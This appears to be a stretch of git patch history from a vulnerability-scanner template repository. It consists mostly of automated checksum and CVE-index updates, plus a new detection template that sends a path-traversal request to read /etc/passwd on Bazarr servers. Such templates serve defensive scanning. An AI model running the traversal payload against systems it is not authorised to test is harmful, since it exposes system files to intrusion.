ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e791ef0303f7c7941f102a9757345b6608e027c0 +templates-checksum.txt:da7537e238b6ef1d553e800ca6277c8238071cf0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e87cdfc0cf8a8377b4e3755d7b95e850920b55ab Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 13:59:09 +0000 Subject: [PATCH 1430/1841] Auto Template Signing [Thu Jul 18 13:59:09 UTC 2024] :robot: --- http/misconfiguration/installer/freshrss-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/freshrss-installer.yaml b/http/misconfiguration/installer/freshrss-installer.yaml index 3c859f581b..18d0a8cb78 100644 --- a/http/misconfiguration/installer/freshrss-installer.yaml +++ b/http/misconfiguration/installer/freshrss-installer.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502201be450e605b599c6d36b357788f621d3a83eab8869cb89db0ff2fbee40144bc3022100ddee3a990f7e99e484aab70b043588bef73456fad195f25223e240fb32da0499:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ccfb83baf193e00b9d043b646651ba624fe567b4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 14:01:18 +0000 Subject: [PATCH 1431/1841] Auto Generated cves.json [Thu Jul 18 14:01:18 UTC 2024] :robot: --- cves.json | 8 ++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 6b513c36b5..f9866e74a8 100644 --- a/cves.json +++ b/cves.json @@ -2276,6 +2276,7 @@ {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} {"ID":"CVE-2023-43472","Info":{"Name":"MLFlow \u003c 2.8.1 - Sensitive Information Disclosure","Severity":"high","Description":"An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43472.yaml"} +{"ID":"CVE-2023-43662","Info":{"Name":"ShokoServer System - Local File Inclusion (LFI)","Severity":"high","Description":"ShokoServer is a media server which specializes in organizing anime. In affected versions the `/api/Image/WithPath` endpoint is accessible without authentication and is supposed to return default server images. The endpoint accepts the parameter `serverImagePath`, which is not sanitized in any way before being passed to `System.IO.File.OpenRead`, which results in an arbitrary file read.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-43662.yaml"} {"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} {"ID":"CVE-2023-44012","Info":{"Name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44012.yaml"} {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} @@ -2447,6 +2448,7 @@ {"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"} {"ID":"CVE-2024-31982","Info":{"Name":"XWiki \u003c 4.10.20 - Remote code execution","Severity":"critical","Description":"XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31982.yaml"} {"ID":"CVE-2024-32113","Info":{"Name":"Apache OFBiz Directory Traversal - Remote Code Execution","Severity":"high","Description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32113.yaml"} +{"ID":"CVE-2024-32238","Info":{"Name":"H3C ER8300G2-X - Password Disclosure","Severity":"critical","Description":"H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-32238.yaml"} {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} @@ -2461,6 +2463,8 @@ {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"} +{"ID":"CVE-2024-34257","Info":{"Name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","Severity":"high","Description":"TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34257.yaml"} +{"ID":"CVE-2024-34351","Info":{"Name":"Next.js - Server Side Request Forgery (SSRF)","Severity":"high","Description":"Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34351.yaml"} {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} {"ID":"CVE-2024-34982","Info":{"Name":"LyLme-Spage - Arbitary File Upload","Severity":"high","Description":"An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34982.yaml"} @@ -2478,6 +2482,7 @@ {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} +{"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} {"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"} @@ -2493,6 +2498,8 @@ {"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} {"ID":"CVE-2024-6028","Info":{"Name":"Quiz Maker \u003c= 6.5.8.3 - SQL Injection","Severity":"critical","Description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6028.yaml"} {"ID":"CVE-2024-6188","Info":{"Name":"TrakSYS 11.x.x - Sensitive Data Exposure","Severity":"medium","Description":"A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6188.yaml"} +{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"} +{"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} @@ -2509,3 +2516,4 @@ {"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} {"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"} {"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"} +{"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"network/cves/2024/CVE-2024-6746.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index bc5f3318a9..532b6b33ee 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -851cf7ffd87eb1993861c3b1212f2cc1 +e9319efcb982168a267342cfa06eefb3 From e4fa15ba4187d4fb2bfc7e7bccbfc16dae42f32e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 18 Jul 2024 14:02:20 +0000 Subject: [PATCH 1432/1841] Auto Generated New Template Addition List [Thu Jul 18 14:02:20 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 1c1ddfc29b..63128aa119 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/cves/2024/CVE-2024-6289.yaml http/cves/2024/CVE-2024-6646.yaml +http/default-logins/deluge/deluge-default-login.yaml http/default-logins/gitblit/gitblit-default-login.yaml http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml @@ -26,6 +27,7 @@ http/exposures/configs/snoop-servlet-exposure.yaml http/exposures/files/adcs-certificate.yaml http/misconfiguration/freshrss-unauth.yaml http/misconfiguration/installer/adguard-installer.yaml +http/misconfiguration/installer/freshrss-installer.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml From 26c99375d8e9527fb2a50ab7261558b4df2d7b3c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 14:02:35 +0000 Subject: [PATCH 1433/1841] Auto Generated Templates Checksum [Thu Jul 18 14:02:35 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 60deb2c303..5617f6874d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:4c2a84b412e8ffa5b7a00e4e63db995d52456256 -cves.json-checksum.txt:8d61f38e96d89a3923979efdff942cf8c7b56fc0 +cves.json:9982e6a78a95ccb7d7429c131d3afc5fb6ba57c4 +cves.json-checksum.txt:0ccb38ecde404c9d7db407e323cbc298bcf083cc dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3565,7 +3565,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 -http/default-logins/deluge/deluge-default-login.yaml:f8ed90dba1143cfdd3b1bd666ffe85243fc9a8b1 +http/default-logins/deluge/deluge-default-login.yaml:6cf3abab04f64ba8c5c5f4435202e6e036822c3f http/default-logins/dialogic/dialogic-xms-default-login.yaml:4f64a4ef93735304917e46ae85e4689a3fde7c5b http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:757e37421ad654500aeb166c26016e839e77f176 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada @@ -5682,7 +5682,7 @@ http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892 http/misconfiguration/installer/flarum-installer.yaml:b7ee710c481aa3675092568601ea31b522313b39 http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a -http/misconfiguration/installer/freshrss-installer.yaml:8d16de98765691d9b1a48524ad583e20fd904f45 +http/misconfiguration/installer/freshrss-installer.yaml:55b488d384b6334be46b7e9565840871d996a10b http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -8901,7 +8901,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:da7537e238b6ef1d553e800ca6277c8238071cf0 +templates-checksum.txt:984e6115bf2b042cd3c1b53b7ff43c8cb0e0d085 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e9e103f89cd5324b03f4b2718317ce6add17361e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 18 Jul 2024 14:03:10 +0000 Subject: [PATCH 1434/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8341ae4680..807562b71b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,6 +21,7 @@ on: - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/cves/2024/CVE-2024-6289.yaml' - 'http/cves/2024/CVE-2024-6646.yaml' + - 'http/default-logins/deluge/deluge-default-login.yaml' - 'http/default-logins/gitblit/gitblit-default-login.yaml' - 'http/exposed-panels/adguard-panel.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' @@ -31,6 +32,7 @@ on: - 'http/exposures/files/adcs-certificate.yaml' - 'http/misconfiguration/freshrss-unauth.yaml' - 'http/misconfiguration/installer/adguard-installer.yaml' + - 'http/misconfiguration/installer/freshrss-installer.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' From 03fc7ed97f598dffd7262e61988887ed2e35da31 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 18 Jul 2024 20:04:25 +0530 Subject: [PATCH 1435/1841] FP - Fix beanstalk-service.yaml --- network/enumeration/beanstalk-service.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml index 5daa4d047d..b4bf3eeb68 100644 --- a/network/enumeration/beanstalk-service.yaml +++ b/network/enumeration/beanstalk-service.yaml @@ -26,11 +26,12 @@ tcp: - type: word part: raw words: - - "OK" + - "cmd-release" + - "cmd-peek" + condition: and extractors: - type: regex name: stats regex: - '([a-z-A-Z: 0-9]+)' -# digest: 4a0a00473045022100f13f7f2a167d41126ca8234ede8b238c55dd296174d15fcd9f1874c7dfecbaef022060ed737def913452bd34f3cbab1d1f3148af684f6100ba87a99ecfe5d602f147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2b4706defeba0e0c1ff9ea782443c028ec91b28e Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Thu, 18 Jul 2024 21:52:31 +0300 Subject: [PATCH 1436/1841] bazarr lfi --- .../other/bazarr-arbitrary-file-read.yaml | 50 +++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml new file mode 100644 index 0000000000..45b31d282d --- /dev/null +++ b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml @@ -0,0 +1,50 @@ +id: bazarr-arbitrary-file-read + +info: + name: Bazarr < 1.4.3 - Arbitrary File Read + author: securityforeveryone + severity: high + description: | + Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability. + reference: + - https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md + - https://www.bazarr.media/ + metadata: + vendor: morpheus65535 + product: bazarr + fofa-query: title=="Bazarr" && icon_hash="-1983413099" + tags: bazarr,lfi +flow: http(1) && http(2) + +http: + - raw: + - | + GET /login HTTP/1.1 + + matchers: + - type: word + words: + - '<title>Bazarr' + internal: true + + - raw: + - | + GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 From 0047609bc3ebebef801a0a173401270082093dcd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 19 Jul 2024 04:07:20 +0000 Subject: [PATCH 1437/1841] Auto WordPress Plugins Update [Fri Jul 19 04:07:20 UTC 2024] :robot: --- helpers/wordpress/plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/duplicator.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/nextgen-gallery.txt | 2 +- helpers/wordpress/plugins/redux-framework.txt | 2 +- helpers/wordpress/plugins/royal-elementor-addons.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- 